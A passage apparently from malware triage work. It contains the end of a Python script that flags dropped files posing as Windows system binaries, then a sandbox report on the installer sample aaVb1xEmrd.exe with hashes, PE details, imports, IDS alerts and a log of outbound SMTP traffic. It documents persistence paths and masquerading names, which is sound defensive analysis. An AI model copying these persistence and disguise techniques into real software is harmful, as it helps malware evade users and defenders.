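# The only legitimate homes for those names in this example (WinSxS etc. would need adding).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# (dropped path, process that wrote it, SHA-256) as listed in the report; last row is a
# constructed benign control with an all-zero placeholder hash.
DROPPED = [
    ("C:\\Users\\user\\AppData\\Local\\Temp\\taskhost.exe",
     "C:\\Users\\user\\Desktop\\aaVb1xEmrd.exe",
     "029910F3FC7C1BC1DAA32A70BD334CCC767E7A0D0BDC011881099C9507ADB3B6"),
    ("C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows Firewall\\WIN32.exe",
     "C:\\Users\\user\\AppData\\Local\\Temp\\svchost.exe",
     "92EC56AE1720E4B05078BB970C4655904CC61BA11FD13482D1B234504589DF2B"),
    ("C:\\Users\\user\\AppData\\Roaming\\Windows Update.exe",
     "C:\\Users\\user\\AppData\\Local\\Temp\\iExplorer.exe",
     "4F21D6AF6EACAE330AE755BF05739C7D8D61567CDCD3F3FF3AD57EF714D8B932"),
    ("C:\\Users\\user\\AppData\\Roaming\\WindowsUpdate.exe",
     "C:\\Users\\user\\AppData\\Local\\Temp\\taskhost.exe",
     "029910F3FC7C1BC1DAA32A70BD334CCC767E7A0D0BDC011881099C9507ADB3B6"),
    ("C:\\Windows\\System32\\svchost.exe",
     "C:\\Windows\\System32\\services.exe",
     "0000000000000000000000000000000000000000000000000000000000000000"),
]


def is_masquerading(path: str) -> bool:
    """True when a system-binary name sits outside the system directories."""
    low = path.lower()
    return ntpath.basename(low) in SYSTEM_BINARIES and not low.startswith(SYSTEM_DIRS)


def triage(records):
    """Return {dropped_path: [reasons]} for every record that trips at least one check."""
    findings = defaultdict(list)
    for dropped, writer, _sha in records:
        if is_masquerading(dropped):
            findings[dropped].append("dropped-file-masquerades-as-system-binary")
        if is_masquerading(writer):
            findings[dropped].append("writer-masquerades-as-system-binary")
        low = dropped.lower()
        if "\\appdata\\" in low and low.endswith((".exe", ".dll")):
            findings[dropped].append("pe-dropped-under-user-profile")
    return dict(findings)


def duplicate_payloads(records):
    """Group dropped paths by SHA-256 and keep hashes written to more than one location."""
    by_hash = defaultdict(list)
    for dropped, _writer, sha in records:
        by_hash[sha.upper()].append(dropped)
    return {sha: paths for sha, paths in by_hash.items() if len(paths) > 1}


if __name__ == "__main__":
    for path, reasons in triage(DROPPED).items():
        print(path, "->", ", ".join(reasons))
    for sha, paths in duplicate_payloads(DROPPED).items():
        print(sha[:16], "written to", len(paths), "locations:", paths)
```

The iExplorer.exe writer is the limit of exact name matching: a lookalike (iExplorer vs iexplore, "Windows Update.exe") passes the system-name check and is caught here only by the user-profile rule, so a production version needs a fuzzy or brand-name rule on top. The hash grouping is what exposes the second persistence copy without reading any file contents.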

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):7.98493346971263
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:aaVb1xEmrd.exe
                                                                    File size:835015
                                                                    MD5:c428b176eca6b17cda3f5729abaddf0b
                                                                    SHA1:65262ee5ea9c832436c6eba4a5e58d69900aea72
                                                                    SHA256:b139dd73d811c0d20602ebd74f962724d2c9e31958bdea9326473bf4bbd746b9
                                                                    SHA512:fc6ec90e224a9af1fb1d996bd4067c7f8f00749840fa7c2c446fc6c6a7c158bfcfb913b96b8586d73a41a80bd107690c50fb0c50e1cef43cad8ca6cba1cda886
                                                                    SSDEEP:24576:UA892H+rl3WuNI3jhCXkqzp/GAqDF+Q0o:nQM+D6zhCUg9GNDF+c
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........lJ...$...$...$./.{...$...%.9.$.".y...$.......$.f."...$.Rich..$.........................PE..L....y.F.................\.........

                                                                    File Icon

                                                                    Icon Hash:30b278e8d4d49633

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x40315d
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                    DLL Characteristics:
                                                                    Time Stamp:0x460E79C3 [Sat Mar 31 15:09:55 2007 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:4d17be67c8d0394c5c1b8e725359ed89

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 00000180h
                                                                    push ebx
                                                                    push esi
                                                                    xor ebx, ebx
                                                                    push edi
                                                                    mov dword ptr [ebp-0Ch], ebx
                                                                    mov dword ptr [ebp-08h], 00409230h
                                                                    mov dword ptr [ebp-04h], ebx
                                                                    mov byte ptr [ebp-14h], 00000020h
                                                                    call dword ptr [00407030h]
                                                                    push ebx
                                                                    call dword ptr [00407270h]
                                                                    mov dword ptr [0042F0D0h], eax
                                                                    push ebx
                                                                    lea eax, dword ptr [ebp-00000180h]
                                                                    push 00000160h
                                                                    push eax
                                                                    push ebx
                                                                    push 00429440h
                                                                    call dword ptr [00407154h]
                                                                    push 00409224h
                                                                    push 0042E820h
                                                                    call 00007FC228BE8D23h
                                                                    call dword ptr [004070B0h]
                                                                    mov esi, 00435000h
                                                                    push eax
                                                                    push esi
                                                                    call 00007FC228BE8D11h
                                                                    push ebx
                                                                    call dword ptr [00407108h]
                                                                    cmp byte ptr [00435000h], 00000022h
                                                                    mov dword ptr [0042F020h], eax
                                                                    mov eax, esi
                                                                    jne 00007FC228BE653Bh
                                                                    mov byte ptr [ebp-14h], 00000022h
                                                                    mov eax, 00435001h
                                                                    push dword ptr [ebp-14h]
                                                                    push eax
                                                                    call 00007FC228BE880Ch
                                                                    push eax
                                                                    call dword ptr [00407210h]
                                                                    mov dword ptr [ebp-10h], eax
                                                                    jmp 00007FC228BE6594h
                                                                    cmp cl, 00000020h
                                                                    jne 00007FC228BE6538h
                                                                    inc eax
                                                                    cmp byte ptr [eax], 00000020h
                                                                    je 00007FC228BE652Ch
                                                                    cmp byte ptr [eax], 00000022h
                                                                    mov byte ptr [ebp-14h], 00000020h
                                                                    jne 00007FC228BE6537h
                                                                    inc eax
                                                                    mov byte ptr [ebp-14h], 00000022h
                                                                    cmp byte ptr [eax], 0000002Fh
                                                                    jne 00007FC228BE6567h
                                                                    inc eax
                                                                    cmp byte ptr [eax], 00000053h
                                                                    jne 00007FC228BE6541h
                                                                    mov cl, byte ptr [eax+01h]

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                    Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x7448           0xb4          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x38000          0x1488        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x7000           0x280         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5bba | 0x5c00 | False | 0.676672894022 | data | 6.47700627279 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x11f0 | 0x1200 | False | 0.466796875 | data | 5.2756827095 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x260d4 | 0x400 | False | 0.650390625 | data | 5.15843208882 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x30000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x38000 | 0x1488 | 0x1600 | False | 0.330965909091 | data | 3.37907638684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x38148 | 0x10a8 | data | English | United States
RT_DIALOG | 0x391f0 | 0x100 | data | English | United States
RT_DIALOG | 0x392f0 | 0x11c | data | English | United States
RT_DIALOG | 0x39410 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x39470 | 0x14 | data | English | United States

Imports

DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, CopyFileA, CloseHandle, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, MulDiv, ReadFile, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, ExitProcess
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, RegisterClassA, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, ShowWindow, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, wsprintfA
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States | 

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
09/06/21-11:22:25.883661 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49712 | 104.16.154.36 | 192.168.2.3
09/06/21-11:22:33.904181 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49715 | 104.16.154.36 | 192.168.2.3

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 6, 2021 11:22:24.544179916 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:24.598454952 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:24.600084066 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:24.654927015 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:24.655308962 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:24.710143089 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:24.710182905 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:24.710491896 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:24.764374018 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:24.806401968 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:24.866573095 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:24.867167950 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:24.867187977 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:24.869565964 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:24.876195908 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:24.931176901 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.005707026 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.060208082 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.061675072 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.115874052 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.116399050 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.215164900 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.416925907 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.417553902 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.474997044 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.475313902 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.491918087 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.547077894 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.550394058 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.613090992 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.616991043 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.617243052 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.617393017 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.617480993 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.617702961 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.617791891 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.617877007 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.617960930 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.618057013 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.618140936 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.618221045 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.618305922 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.618387938 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.618472099 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.618551970 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.671758890 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.671787024 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.671792984 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.671817064 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.671829939 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.671993971 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.672041893 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.672317982 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.672698021 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.672710896 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.674706936 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.674741030 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.674989939 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.713980913 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.720005035 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.720033884 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.725935936 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.725954056 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.725960016 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.725975037 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.725986958 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.725994110 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.726001024 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.726011992 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.726023912 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.726023912 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.726036072 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.726046085 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.726053953 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.726063967 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.726103067 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.726134062 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.726150036 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.726161003 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.726171970 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.728888035 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.728904009 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.728910923 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.728923082 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.729044914 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.729055882 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.729094028 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.729125977 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.729156971 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.774319887 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.775288105 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.775486946 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.780118942 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.780137062 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.780226946 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.780318975 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.780356884 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.780368090 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.780420065 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.780432940 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.780594110 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.780741930 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.781013012 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.781122923 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.781270981 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.781390905 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.781527042 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.781657934 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.781789064 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.781917095 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.783168077 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.783184052 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.783368111 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.783379078 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.783385992 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.783494949 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.783632040 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.783799887 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.783934116 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.784069061 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.784198999 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.784481049 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.784605026 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.784744978 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.784872055 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.785021067 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.785140991 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.785286903 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.785413027 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.785547018 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.785684109 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.785913944 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.785969019 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.826108932 CEST | 49712 | 80 | 192.168.2.3 | 104.16.154.36
Sep 6, 2021 11:22:25.831257105 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.831279039 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.831427097 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.831479073 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.831593990 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.831759930 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.831901073 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.834530115 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.834548950 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.835877895 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.835916996 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.835932016 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.835938931 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.835951090 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.835958004 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.835967064 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:25.835968018 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.836129904 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.836272001 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.836399078 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.836563110 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.836791039 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.836925030 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.837003946 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:25.837117910 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160
